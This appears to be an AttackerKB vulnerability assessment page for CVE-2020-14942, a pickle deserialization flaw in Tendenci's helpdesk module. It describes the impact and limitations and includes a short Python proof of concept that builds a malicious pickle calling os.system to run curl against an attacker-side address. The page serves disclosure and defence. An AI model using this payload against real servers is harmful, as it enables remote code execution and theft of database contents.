Low
CVE-2020-14942
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2020-14942
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.
Add Assessment
Ratings
-
Attacker ValueLow
-
ExploitabilityHigh
Technical Analysis
Outline
Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.
Impact
If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.
Limitations
- The helpdesk module is not enabled by default.
- A valid authenticated account with permissions to access /tickets
Patch
This doesn’t not appear to be patched in the latest release, although it has been acknowledged
POC
It is fairly easy to create a functional POC against this target if the feature is enabled.
Modify the following POC to fit your needs.
import pickle import base64 import os class RCE: def __reduce__(self): cmd = ('curl 172.22.0.1:1234') return os.system, (cmd,) if __name__ == '__main__': pickled = pickle.dumps(RCE()) print(base64.urlsafe_b64encode(pickled))
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- tendenci
Products
- tendenci 12.0.10
References
Miscellaneous
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: